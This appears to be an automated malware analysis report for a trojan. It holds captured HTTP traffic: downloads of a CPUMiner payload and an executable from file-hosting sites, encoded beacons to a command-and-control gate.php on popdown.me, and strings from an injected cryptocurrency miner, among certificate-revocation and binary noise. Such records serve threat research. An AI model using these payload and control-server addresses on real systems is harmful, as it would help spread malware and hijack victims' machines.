erisign.com/rpa (c)09100...U...'VeriSign Class 3 Code Signing 2009-2 C
A..140510210002Z..140524210002Z0..h0!.....V..t..'.F(z....121202220203Z
0!.... .;...9.7.......090826054212Z0!...\.)../F..^p..s...100722072726Z
0!......P....A.x......100708154305Z0!.......O#.`n.5j.9...100930040708Z
0!..../..8~p...h......091006052837Z0!.....(../L....--aK..091029040207Z
0!...aW.....B.!.0..t..090909121104Z0!...g,..4(vv....mJ_..100514054218Z
0!.....V.....(..-..p..090826162211Z0!....O..,J.N.n...Ly..091028032204Z
0!....42r...I.Y@...3..100526162150Z0!.........}..Dt...!..090922192227Z
0!.......2l....7i..?..101109030426Z0!.....p%...l,AogP....100523060224Z
0!...,.P.C......*.....100303082219Z0!...NRPL.............100413090225Z
0!....1w....d.&..8....091026111702Z0!......F....e........090608081352Z
0!.....6..d6.7..4.....100924123027Z0!....$..*...s..&s....100219210742Z
0!......Q_.G..|.......091009145530Z0!........>..O...=72..1006161609
34Z0!....Xlm$|".su.......090619194406Z0!......J)..E......C..1009221422
43Z0!...D......u.y.Iy{k..101026130323Z0!...El...)>..W..<K...1010
04225456Z0!...p..wy.i.zc...X...091117001921Z0!.....,{..^..........0912
03194409Z0!....B....d...*.P.@..100705023431Z0!.......m. .V.....~..1011
11134216Z0!...2.R.i.{..........091029071123Z0!...`F..q2..O.:......1006
02074221Z0!...a{.-...@...'.....100723194022Z0!........fW.y.,s.....1010
11182226Z0!....Um..}.8)........100324085953Z0!....,u.boxr....Z....
<<< skipped >>>


GET /CSC3-2009.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: csc3-2009-crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "1bafe804fc42b27d2a70335cb2162128:1399755910"
Last-Modified: Sat, 10 May 2014 21:05:10 GMT
Accept-Ranges: bytes
Content-Length: 2249
Date: Sun, 11 May 2014 03:57:53 GMT
Connection: keep-alive
Content-Type: application/pkix-crl
0...0......0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0
...U....VeriSign Trust Network1;09..U...2Terms of use at hXXps://VVV.v
erisign.com/rpa (c)091.0,..U...%VeriSign Class 3 Code Signing 2009 CA.
.140510210003Z..140524210003Z0...0!.....zOR.D...,oMa...090525061903Z0!
......t.o=(..(..G...090520231844Z0!... ....M...m.Q.&...090517075442Z0!
...T.Ay(..U...:_|...090608072333Z0!... .(.....F..9.....090805090059Z0!
.......P..._}..;.x..090714150126Z0!.....5=.qOV[.cyg.&..090528172131Z0!
...K...=$.6.........090521015930Z0!...-H...D...tDXUN...090527062050Z0!
.......-.'@..<B{....090525110212Z0!......x..m*[.7.h#"..090702070220
Z0!.....%.o.....kT.....090527062152Z0!..!.*;....)..Ef..k..090529084018
Z0!..#.}h..."..........090527050204Z0!..$.I^./@.:7.p.,v...090521201736
Z0!..&.5{.....Q;D......090521184343Z0!..&...T[.~y.........090903081104
Z0!...q..m...G..i^.....090521025017Z0!../a.nS..[lA.lCB....090527045238
Z0!..0.....R..iX.px....090605052910Z0!..2.h..).n......p;..090713144756
Z0!..:.............. ..090605052934Z0!..;.0.*.v..*....P...090601001940
Z0!..?..}p 2I..o.\..u..090527061825Z0!..?....@.Z`......l..090527022214
Z0!..B..h~a..]..L.2....100512125735Z0!..B.U..ZF...........090527041620
Z0!..F'....?xxnx.6Q....090528003453Z0!..F|A..r....#.@.&...090527062259
Z0!..L.r....F..^..i.t..090608130549Z0!..Q...Y...Exm.._7...090520225737
Z0!..TH..~.. ..({......090723115618Z0!..U.59Z..[.G.RmyR1..090527071534
Z0!..V ].h.../".V<8-...090611075746Z0!..gHT...j5zdG....K..090521205
535Z0!..mje.......;.......090521012215Z0!..p^..E.{.>.........09
<<< skipped >>>


GET /pca3-g2.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "072641a27cd10308fabc881f069f37c1:1396126208"
Last-Modified: Sat, 29 Mar 2014 20:50:08 GMT
Accept-Ranges: bytes
Content-Length: 1415
Date: Sun, 11 May 2014 03:57:53 GMT
Connection: keep-alive
Content-Type: application/pkix-crl
0...0...0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1<0
:..U...3Class 3 Public Primary Certification Authority - G21:08..U...1
(c) 1998 VeriSign, Inc. - For authorized use only1.0...U....VeriSign T
rust Network..140320000000Z..140630235959Z0...0!...=...X.FL...3..I..08
0403173458Z0!...SJs|.."E.G.......070412172616Z0!....E........W6.n...14
0129192923Z0!.......jvO..!....]..040401180422Z0!......\*....bO-.....08
0403173459Z0!....I..:.<....9..m..070412172523Z0!.........R.E!..=t..
.070522172634Z0!....}.....}.}.(q.C..040401180606Z0!...`.6..,...u.~x.:.
.080403173459Z0!.........wX.....~...080606171636Z0!..$.Jn>.t..d_j..
."..040401180518Z0!.. ..N*(.}H..j......070412172308Z0!.. ..3.J......d.
.9..070522172711Z0!..50.h.:....s.K"....040401180542Z0!..7_f...s.......
....080403173459Z0!..<.J..y..)..~x7.e..080606171735Z0!..NS.c.f.....
.7.p...070412172213Z0!..N.k;..-...9J..-...070522172748Z0!..Q..2pRv.WC.
:..f...030109181346Z0!..Tq..m..*..........140129192925Z0!..^..CX4.3...
 F.R...070522172548Z0!..^..)..P3...7...L..080403173459Z0!..e........O.
^.S....080403173457Z0!..jP....Wv..[.v.5H..070412172102Z0!..nk.l.!y.~..
.7G@...070412171752Z0!..r.q.I-Ln./........080403173458Z0!..t8....D....
.......080606171524Z0!..t.xn.tS....O_.....070412171951Z0!..v......Qnw.
.W.g...140129192921Z0...*.H................V.!F.Y..p.V......s..%..*l.z
=...R./.F....q.......D.t......0b..?.R:9.(.|.....VBp8.......PZ...[o\p..
.U...........$).V.D....B@......
<<< skipped >>>

GET /pca3-g5.crl HTTP/1.1


Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "895f8ccd92dfec674c94f0d04d1b63bc:1396128308"
Last-Modified: Sat, 29 Mar 2014 21:25:08 GMT
Accept-Ranges: bytes
Content-Length: 533
Date: Sun, 11 May 2014 03:57:54 GMT
Connection: keep-alive
Content-Type: application/pkix-crl
0...0..0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U
....VeriSign Trust Network1:08..U...1(c) 2006 VeriSign, Inc. - For aut
horized use only1E0C..U...<VeriSign Class 3 Public Primary Certific
ation Authority - G5..140320000000Z..140630235959Z0...*.H.............
}...a.D[..8..i.....g8..S..tt..a.e.B]..v.l9.m.....~.G(l...G..#z{...Za..
F.q....2^X..w.i'.&..n...4v8. &|/Y.B..%..J..g0."k.0....A..7.)h...=5....
'Z........y.Ye.......M.._5.9..B.*.. .4z@.7#...... UL.F......iDg..6...'
z$.E.E..*..g...2.@D.....&v...o..>..k1N...P...iHTTP/1.1 200 OK..Serv
er: Apache..ETag: "895f8ccd92dfec674c94f0d04d1b63bc:1396128308"..Last-
Modified: Sat, 29 Mar 2014 21:25:08 GMT..Accept-Ranges: bytes..Content
-Length: 533..Date: Sun, 11 May 2014 03:57:54 GMT..Connection: keep-al
ive..Content-Type: application/pkix-crl..0...0..0...*.H........0..1.0.
..U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1:0
8..U...1(c) 2006 VeriSign, Inc. - For authorized use only1E0C..U...<
;VeriSign Class 3 Public Primary Certification Authority - G5..1403200
00000Z..140630235959Z0...*.H.............}...a.D[..8..i.....g8..S..tt.
.a.e.B]..v.l9.m.....~.G(l...G..#z{...Za..F.q....2^X..w.i'.&..n...4v8. 
&|/Y.B..%..J..g0."k.0....A..7.)h...=5....'Z........y.Ye.......M.._5.9.
.B.*.. .4z@.7#...... UL.F......iDg..6...'z$.E.E..*..g...2.@D.....&v...
o..>..k1N...P...i..
<<< skipped >>>


GET /gett/9a2RqWN1/CPUMiner.files?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=qD9RH/IX4s2iZULzsbyWAN3tBVs=&Expires=1399780798 HTTP/1.1
Host: s3.kkloud.com.s3.amazonaws.com
Connection: Keep-Alive


HTTP/1.1 200 OK
x-amz-id-2: TeHG2XT52p6a12Oy8ifa0G2eLQCSJvBJzOirYekEb9zoHGypEejtZoDD0ROgw8at
x-amz-request-id: 9009543A81F42AD2
Date: Sun, 11 May 2014 03:57:43 GMT
Content-Disposition: attachment;
Last-Modified: Sun, 02 Mar 2014 22:54:08 GMT
ETag: "bb1f7298813a025110816dbf3abf16c1-1"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Content-Length: 1511936
Server: AmazonS3
......................................................................
........................S.R.E.S.U._.Y.E.K.H.........................0.
..E.N.I.H.C.A.M._.L.A.C.O.L._.Y.E.K.H.........................@...R.E.
S.U._.T.N.E.R.R.U.C._.Y.E.K.H.........................>...G.I.F.N.O
.C._.T.N.E.R.R.U.C._.Y.E.K.H.........................B...T.O.O.R._.S.E
.S.S.A.L.C._.Y.E.K.H.........................>.............2.3.m.e.
t.s.y.S.\.>.t.o.o.R.m.e.t.s.y.S.<.......2.3.m.e.t.s.y.S.......`.
..^...\...J.........................................................&g
t;.t.o.o.R.m.e.t.s.y.S.<.......>.t.o.o.R.m.e.t.s.y.S.<.......
h...f...d...J.........................................................
......................................................................
......................................................................
.....................................7.7.7.7.7.7.7.7.7.7.7.7h7d7`7\7X7
T7P7L7H7D7@7<7874707,7(7$7 7.7.7.7.7.7.7.7.6.6.6.6.6.6.6.6.6.6.6.6.
6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6|6x6t6p6l6h6d6`6\6X6T6P6L6H6D
6@6<6864606,6(6$6 6.6.6.6.6.6.5.5.5.5.5.5.5.5.5.5...........0.0.0.0
|0x0t0p0l0h0d0`0\0X0T0P0L0H0D0@0<0804000,0(0$0 0.0.0.0....H......5.
5.5.5.5.5.5.4.4.4.4.4.4.4.4.4.4.4.4.2p2l2h2d2`2\2X2T2P2L2H2D2@2<282
4202,2(2$2 2.2.2.2.2.2.2.2.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1
.1.1.1.1.1.1.1.1.1.1.1|1x1t1p1l1h1d1`1\1X1T1P1L1H1D1@1<1.1.0.0.0.0.
0.0.0.0.......p...0.040 0.0.0.0.......@.2.1.1.1.1.1.1.1.1.1r1b1R1B121"
1.1.0.0.0.0.0....4..0.=A<.<.<o737.7.6.6.6.6.6i6U6F616.5.5
<<< skipped >>>


POST /wordpress/1/gate.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: popdown.me
Content-Length: 194
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




crypt===gKtRWYqMDUYpieId0Mz4iMgAEIgATN1YTRgACIgASVQNEIvVHRgITKNRFKlJ3b
DBSKShCblRnbJpCIukUSgE0RWNFIlJXY31kVq4WatRWQqE0LOpiN4gHIQhFIzd3bk5WaXp
iM4IzN3QWY2QWMxkjZhZzNjNWNlFWZ4czN4UWYkRWM1ImYyMzYwEzM

HTTP/1.1 200 OK


Server: nginx
Date: Sun, 11 May 2014 03:46:18 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.28
208..=wXZ4VmLyYDNzYDIkF2bs52dvR2Pi9Gbi9CMvEzZPZnSjJmNvMXZslmZvEzLpBXYv
QHduU2Zv8iOwRHdoBCZh9Gbud3bk5CdvJGfqMXZ5ByZtACNzITMgAXLgUFUH5CZtFmYiNG
I11CIzMzMzoTbvNmLz5WavNWLl1WLlZXan5yY0x2LvoDcjR3KtVHdhJHdzBybtACdwlncj
NHIh1iKgQWYvxmb39GZ/I2bsJ2Lx8SMOdVcSJTY58yclxWam9SMvkGch9Cd05SZn9yL6AH
d0hGI0JXY0NnL1B3ZuIXZulWb8VGbiFmbl5iclxGbptGdvJGfqMFRBVkUIRFI01CI0MjMx
oTVQNkLk1WYiJ2Yg8ULgMzMzMjOt92YuMnbp92YtUWbtUmdpdmLjRHbv8iOwNGdr0Wd0Fm
c0NHIv1CI0BXeyN2cgEWLqACZh9Gbud3bk9jYvxmYvAzLx40VxJlMhlzLzVGbpZ2Lx8Saw
F2L0RnLld2LvoDc0RHagQnchR3cuIXZulWb..0..HTTP/1.1 200 OK..Server: nginx
..Date: Sun, 11 May 2014 03:46:18 GMT..Content-Type: text/html..Transf
er-Encoding: chunked..Connection: keep-alive..Vary: Accept-Encoding..X
-Powered-By: PHP/5.3.28..208..=wXZ4VmLyYDNzYDIkF2bs52dvR2Pi9Gbi9CMvEzZ
PZnSjJmNvMXZslmZvEzLpBXYvQHduU2Zv8iOwRHdoBCZh9Gbud3bk5CdvJGfqMXZ5ByZtA
CNzITMgAXLgUFUH5CZtFmYiNGI11CIzMzMzoTbvNmLz5WavNWLl1WLlZXan5yY0x2LvoDc
jR3KtVHdhJHdzBybtACdwlncjNHIh1iKgQWYvxmb39GZ/I2bsJ2Lx8SMOdVcSJTY58yclx
Wam9SMvkGch9Cd05SZn9yL6AHd0hGI0JXY0NnL1B3ZuIXZulWb8VGbiFmbl5iclxGbptGd
vJGfqMFRBVkUIRFI01CI0MjMxoTVQNkLk1WYiJ2Yg8ULgMzMzMjOt92YuMnbp92YtUWbtU
mdpdmLjRHbv8iOwNGdr0Wd0Fmc0NHIv1CI0BXeyN2cgEWLqACZh9Gbud3bk9jYvxmYvAzL
x40VxJlMhlzLzVGbpZ2Lx8SawF2L0RnLld2LvoDc0RHagQnchR3cuIXZulWb..0..



POST /wordpress/1/gate.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: popdown.me
Content-Length: 194
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




crypt===gKtRWYqMDUYpieId0Mz4iMgAEIgATN1YTRgACIgASVQNEIvVHRgITKNRFKlJ3b
DBSKShCblRnbJpCIukUSgE0RWNFIlJXY31kVq4WatRWQqE0LOpiN4gHIQhFIzd3bk5WaXp
iM4IzN3QWY2QWMxkjZhZzNjNWNlFWZ4czN4UWYkRWM1ImYyMzYwEzM

HTTP/1.1 200 OK


Server: nginx
Date: Sun, 11 May 2014 03:46:37 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.28
208..=wXZ4VmLyYDNzYDIkF2bs52dvR2Pi9Gbi9CMvEzZPZnSjJmNvMXZslmZvEzLpBXYv
QHduU2Zv8iOwRHdoBCZh9Gbud3bk5CdvJGfqMXZ5ByZtACNzITMgAXLgUFUH5CZtFmYiNG
I11CIzMzMzoTbvNmLz5WavNWLl1WLlZXan5yY0x2LvoDcjR3KtVHdhJHdzBybtACdwlncj
NHIh1iKgQWYvxmb39GZ/I2bsJ2Lx8SMOdVcSJTY58yclxWam9SMvkGch9Cd05SZn9yL6AH
d0hGI0JXY0NnL1B3ZuIXZulWb8VGbiFmbl5iclxGbptGdvJGfqMFRBVkUIRFI01CI0MjMx
oTVQNkLk1WYiJ2Yg8ULgMzMzMjOt92YuMnbp92YtUWbtUmdpdmLjRHbv8iOwNGdr0Wd0Fm
c0NHIv1CI0BXeyN2cgEWLqACZh9Gbud3bk9jYvxmYvAzLx40VxJlMhlzLzVGbpZ2Lx8Saw
F2L0RnLld2LvoDc0RHagQnchR3cuIXZulWb..0..HTTP/1.1 200 OK..Server: nginx
..Date: Sun, 11 May 2014 03:46:37 GMT..Content-Type: text/html..Transf
er-Encoding: chunked..Connection: keep-alive..Vary: Accept-Encoding..X
-Powered-By: PHP/5.3.28..208..=wXZ4VmLyYDNzYDIkF2bs52dvR2Pi9Gbi9CMvEzZ
PZnSjJmNvMXZslmZvEzLpBXYvQHduU2Zv8iOwRHdoBCZh9Gbud3bk5CdvJGfqMXZ5ByZtA
CNzITMgAXLgUFUH5CZtFmYiNGI11CIzMzMzoTbvNmLz5WavNWLl1WLlZXan5yY0x2LvoDc
jR3KtVHdhJHdzBybtACdwlncjNHIh1iKgQWYvxmb39GZ/I2bsJ2Lx8SMOdVcSJTY58yclx
Wam9SMvkGch9Cd05SZn9yL6AHd0hGI0JXY0NnL1B3ZuIXZulWb8VGbiFmbl5iclxGbptGd
vJGfqMFRBVkUIRFI01CI0MjMxoTVQNkLk1WYiJ2Yg8ULgMzMzMjOt92YuMnbp92YtUWbtU
mdpdmLjRHbv8iOwNGdr0Wd0Fmc0NHIv1CI0BXeyN2cgEWLqACZh9Gbud3bk9jYvxmYvAzL
x40VxJlMhlzLzVGbpZ2Lx8SawF2L0RnLld2LvoDc0RHagQnchR3cuIXZulWb..0..



GET /streams/6bcJvOg1/63462.exe?sig=-UXpeL0WanQIYatmLOL4OmQyO4lMnb17DsM&type=download HTTP/1.1
Host: w013064.blob2.ge.tt
Connection: Keep-Alive


HTTP/1.1 200 OK
date: Sun, 11 May 2014 03:57:49 GMT
last-modified: Thu, 08 May 2014 12:19:32 GMT
etag: "6e7e17710d7ca996bf5647cba9efbcee-1"
accept-ranges: bytes
content-type: application/x-msdownload
content-length: 278528
server: gbs
access-control-allow-origin: *
content-disposition: attachment
Connection: keep-alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L....vkS
................................. ........@.. ........................
............@.................................\...O...................
................................................................. ....
........... ..H............text........ ...................... ..`.rsr
c...............................@..@.reloc...............>.........
.....@..B........................H....... ...<...........H!........
.......................................(....(....*.0.......... ....(..
..r...p(....o.........(....o....s.... ....(....r...p(....o....o....(..
...(....r-..po....... ..........i].a....X....i2......(.........(.... .
...(....rI..p(....o....(....t.....o......o.........*:~......o....&*...
(....*................lSystem.Resources.ResourceReader, mscorlib, Vers
ion=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.R
esources.RuntimeResourceSet............PADPADP"..N.........a.o.i.r.a.s
.........Czj7QiJMbypJOmgptLlia/ohTG8qTTpoaUtGYmtCIUxvKk06aClLRmJrQiFMb
ypNOmgpS0Zia0IhTG8qzTpoKUVZ2GVClUWiC/U7JORqEgoCMQE8HUUqSAlEayUDBSxOOE9
IKBoaXCVmCwViZQM8CiBVDExlS29hZiFMbypNOmh5DkZiJ0MiTGdcJmloKUtGYmtCIaxvK
EwxaSFLRpJrQiFsbypNOmgpZUBja0IBTG8qbTtoKUsGYmtiIUxvOk06bClLRmJrQiFIbyp
NOmgpS0YCakIhXG8qTTpoKUhGIu5CIVxvKl06aClLVmJrUiFMbypNOngpS0Zia0IhTG8qT
e5tKEsRYmtCIWxuKq0 aClLRmJrQiFMbypNOmgpS0ZiawIgTGMqTTpoKUtGYmtCIUxvKk0
6aClLRmJrQiFMbypNOmgpS0Zia0IhTG8qTTpoKUtGYmtCIUxvCk06YClLRmJrQiFMb
<<< skipped >>>


GET /CSC3-2010.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: csc3-2010-crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "6796efe0dffeb866d24738665300f835:1399756509"
Last-Modified: Sat, 10 May 2014 21:15:09 GMT
Accept-Ranges: bytes
Content-Length: 126066
Date: Sun, 11 May 2014 03:57:54 GMT
Connection: keep-alive
Content-Type: application/pkix-crl
0...m0...T...0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1
.0...U....VeriSign Trust Network1;09..U...2Terms of use at hXXps://www
.verisign.com/rpa (c)101.0,..U...%VeriSign Class 3 Code Signing 2010 C
A..140510210004Z..140524210004Z0...60!....c..k....D.k.....120708062201
Z0!... _...u.t.=.<.&...130218061114Z0!...&..].....P.k.:...120125130
117Z0!...7P.x....8.Q...s..130227010252Z0!...J.....Q..Y.[.....110404153
956Z0!...d...=..q!_...g9..130729145216Z0!...l.....h2<.H......120329
152211Z0!...q.9...`H.*.Y.C...120525202212Z0!...s...TM.......0...121221
080842Z0!...t..,.. ...eL.....130314222305Z0!...y..r.HW.v.....w..140423
054643Z0!..../u.......A..5...101214165045Z0!.....0.Xc...%...iM..121102
230226Z0!.......S.a&.X5t.E]..111206083350Z0!....c.(....B.[M83...140108
164517Z0!....A.Sv.....f,.....110609003155Z0!.....z......!.ID{]..101228
182208Z0!....b^......{d.J'...130102154110Z0!......0..........I..130912
181631Z0!....6e...~..T.......130131012247Z0!.........bD#*u......130226
223939Z0!.......@..'$.).;}\..130121172259Z0!....7.v..........n..120724
160733Z0!....P;.Y..d...c.(...120209181451Z0!.....].bb[.....!....140328
205453Z0!.....a...L`..IV.....130402103508Z0!......fFW.z.....@T..130117
000242Z0!...........].{7.....120730000000Z0!...".......Z.V.,.e..121031
192224Z0!...'....[.1......g..130318195659Z0!...,GI.jH.|...J.....120518
121623Z0!...<%a.=.d.......O..120424164254Z0!...@........... .a..121
109212441Z0!...L.&L..o.8..=6....110311141238Z0!...L...5...s $.=.=..130
205142241Z0!...O.c.........t....130109132228Z0!...X.BS.G]T.l.w.i..
<<< skipped >>>


GET /1/files/6bcJvOg1/0/blob?download HTTP/1.1
Host: w269456.open.ge.tt
Connection: Keep-Alive


HTTP/1.1 307 Temporary Redirect
location: hXXp://w013064.blob2.ge.tt/streams/6bcJvOg1/63462.exe?sig=-UXpeL0WanQIYatmLOL4OmQyO4lMnb17DsM&type=download
connection: keep-alive
transfer-encoding: chunked
0..HTTP/1.1 307 Temporary Redirect..location: hXXp://w013064.blob2.ge.
tt/streams/6bcJvOg1/63462.exe?sig=-UXpeL0WanQIYatmLOL4OmQyO4lMnb17DsM&
type=download..connection: keep-alive..transfer-encoding: chunked..0..

The Trojan connects to the servers at the folowing location(s):

WScript.exe_2280:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
msvcrt.dll
OLEAUT32.dll
ole32.dll
VERSION.dll
wscript.exe
advapi32.dll
kernel32.dll
%s%s.DLL
wintrust.dll
%d.%d
Invalid parameter passed to C runtime function.
SOFTWARE\Classes\%s\%s
0x%8X
CreateURLMonikerEx
urlmon.dll
@@8X%u
RegCreateKeyA
RegCloseKey
RegOpenKeyA
RegDeleteKeyA
RegCreateKeyExW
RegCreateKeyExA
RegOpenKeyExW
ReportEventW
RegEnumKeyExA
RegOpenKeyExA
GetProcessHeap
GetCPInfo
MsgWaitForMultipleObjects
EnumThreadWindows
wscript.pdb
stdole2.tlbWWW
.ObjectWW
KeyW
WindowsFolderWWW4
%CopyFolderWWL
Windows Script Host (Ver 5.6)W)
Windows Script Host Application InterfaceW%
Windows Script Host Object
ebstrCmdLineW
78t8x8
5Q5F5
Software\Microsoft\Windows Script Host\Settings
Windows Script Host
WScript.CreateObject
WSHRemote.Execute
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s
Microsoft (R) Windows Based Script Host
5.7.0.16599
Microsoft (R) Windows Script Host
(Windows Script Host (debugging disabled)
Windows Script Host Error
Windows Script Host Input Error
This Unicode version of Windows Script Host will only execute under Windows NT.
Please use the ANSI version of Windows Script Host."
WScript execution time was exceeded on script "%1!ls!".
Script execution was terminated.1Could not locate automation class named "%1!ls!".
Could not connect object.'Could not create object named "%1!ls!".1Initialization of the Windows Script Host failed.6Can't find script engine "%2!ls!" for script "%1!ls!".!Can't change default script host.=An attempt at saving your settings via the //S option failed.(Loading script "%1!ls!" failed (%2!ls!).
Loading your settings failed.,Execution of the Windows Script Host failed.,Unexpected error of the Windows Script Host._Windows Script Host access is disabled on this machine. Contact your administrator for details.
Missing job name.*Unicode is not supported on this platform.
Command line options are saved.4The default script host is now set to "wscript.exe".4The default script host is now set to "cscript.exe".,Successful execution of Windows Script Host.3Successful remote execution of Windows Script Host.
Win32 Error 0x%X
Windows Script Host(Windows Script Host (debugging disabled)
Usage: WScript scriptname.extension [option...] [arguments...]
Use engine for executing script
Changes the default script host to CScript.exe
Changes the default script host to WScript.exe (default)
Prevent logo display: No banner will be shown at execution time
#WScript Error - Windows Script Host!Input Error - Windows Script HostlThis Unicode version of WScript will only execute under Windows NT.
%6!ls! WScript - Script Execution Error!Windows Script Host Remote Script/Remote script object can only be executed once. Unable to execute remote script.

%original file name%.exe_1180_rwx_00D10000_0000F000:




u.iD$
.WfxP

%original file name%.exe_1180_rwx_04AA0000_0000A000:




d.buh

%original file name%.exe_1180_rwx_675A6000_00003000:




.Qg<-Qg
*Rg`.Rg|)RgL Rg

WScript.exe_3524:




.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
msvcrt.dll
OLEAUT32.dll
ole32.dll
VERSION.dll
wscript.exe
advapi32.dll
kernel32.dll
%s%s.DLL
wintrust.dll
%d.%d
Invalid parameter passed to C runtime function.
SOFTWARE\Classes\%s\%s
0x%8X
CreateURLMonikerEx
urlmon.dll
@@8X%u
RegCreateKeyA
RegCloseKey
RegOpenKeyA
RegDeleteKeyA
RegCreateKeyExW
RegCreateKeyExA
RegOpenKeyExW
ReportEventW
RegEnumKeyExA
RegOpenKeyExA
GetProcessHeap
GetCPInfo
MsgWaitForMultipleObjects
EnumThreadWindows
wscript.pdb
stdole2.tlbWWW
.ObjectWW
KeyW
WindowsFolderWWW4
%CopyFolderWWL
Windows Script Host (Ver 5.6)W)
Windows Script Host Application InterfaceW%
Windows Script Host Object
ebstrCmdLineW
78t8x8
5Q5F5
Software\Microsoft\Windows Script Host\Settings
Windows Script Host
WScript.CreateObject
WSHRemote.Execute
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s
Microsoft (R) Windows Based Script Host
5.7.0.16599
Microsoft (R) Windows Script Host
(Windows Script Host (debugging disabled)
Windows Script Host Error
Windows Script Host Input Error
This Unicode version of Windows Script Host will only execute under Windows NT.
Please use the ANSI version of Windows Script Host."
WScript execution time was exceeded on script "%1!ls!".
Script execution was terminated.1Could not locate automation class named "%1!ls!".
Could not connect object.'Could not create object named "%1!ls!".1Initialization of the Windows Script Host failed.6Can't find script engine "%2!ls!" for script "%1!ls!".!Can't change default script host.=An attempt at saving your settings via the //S option failed.(Loading script "%1!ls!" failed (%2!ls!).
Loading your settings failed.,Execution of the Windows Script Host failed.,Unexpected error of the Windows Script Host._Windows Script Host access is disabled on this machine. Contact your administrator for details.
Missing job name.*Unicode is not supported on this platform.
Command line options are saved.4The default script host is now set to "wscript.exe".4The default script host is now set to "cscript.exe".,Successful execution of Windows Script Host.3Successful remote execution of Windows Script Host.
Win32 Error 0x%X
Windows Script Host(Windows Script Host (debugging disabled)
Usage: WScript scriptname.extension [option...] [arguments...]
Use engine for executing script
Changes the default script host to CScript.exe
Changes the default script host to WScript.exe (default)
Prevent logo display: No banner will be shown at execution time
#WScript Error - Windows Script Host!Input Error - Windows Script HostlThis Unicode version of WScript will only execute under Windows NT.
%6!ls! WScript - Script Execution Error!Windows Script Host Remote Script/Remote script object can only be executed once. Unable to execute remote script.

nt32.exe_1324_rwx_00D20000_00010000:




u.iD$
.WexP

nt32.exe_1324_rwx_675A6000_00003000:




.Qg<-Qg
*Rg`.Rg|)RgL Rg

cvtres.exe_3500:




.text
``.data
.rdata
`@.bss
.idata
.main
.bxpck
66665\\\\
\\\\5\\\\
666656666
libgcj-12.dll
JSON decode of %s failed
http://
https://
stratum tcp://
http://%s
cpuminer 2.3.2
accepted: %lu/%lu (%.2f%%), %s khash/s %s
DEBUG: reject reason: %s
DEBUG: job_id='%s' extranonce2=%s ntime=x
Starting Stratum on %s
...terminating workio thread
...retry after %d seconds
JSON decode failed(%d): %s
{"method": "mining.submit", "params": ["%s", "%s", "%s", "%s", "%s"], "id":4}
{"method": "getwork", "params": [ "%s" ], "id":1}
JSON key '%s' not found
JSON key '%s' is not a string
CURL initialization failed
%s%s%s
Long-polling activated for %s
json_rpc_call failed, retry after %d seconds
DEBUG: got new work in %d ms
Binding thread %d to cpu %d
thread %d: %lu hashes, %s khash/s
Total: %s khash/s
work retrieval failed, exiting mining thread %d
http://127.0.0.1:9332/
%s: unsupported non-option argument '%s'
JSON option %s invalid
https:
%s:%s
thread %d create failed
%d miner threads started, using '%s' algorithm.
cert
userpass
-o, --url=URL URL of mining server (default: http://127.0.0.1:9332/)
-O, --userpass=U:P username:password pair for mining server
-p, --pass=PASSWORD password for mining server
--cert=FILE certificate for mining server using SSL
-x, --proxy=[PROTOCOL://]HOST[:PORT] connect through a proxy
--no-longpoll disable X-Long-Polling support
--no-stratum disable X-Stratum support
[%d-d-d d:d:d] %s
User-Agent: cpuminer/2.3.2
HTTP request failed: %s
JSON-RPC call failed: %s
hex2bin failed on '%s'
DEBUG: %s
Hash: %s
Target: %s
http%s
http_proxy
Stratum connection failed: %s
{"id": 1, "method": "mining.subscribe", "params": []}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2", "%s"]}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2"]}
mining.notify
Stratum session id: %s
mining.set_difficulty
client.reconnect
stratum tcp://%s:%d
Server requested reconnection to %s
client.get_version
cpuminer/2.3.2
client.show_message
MESSAGE FROM SERVER: %s
{"id": 2, "method": "mining.authorize", "params": ["%s", "%s"]}
%s near '%s'
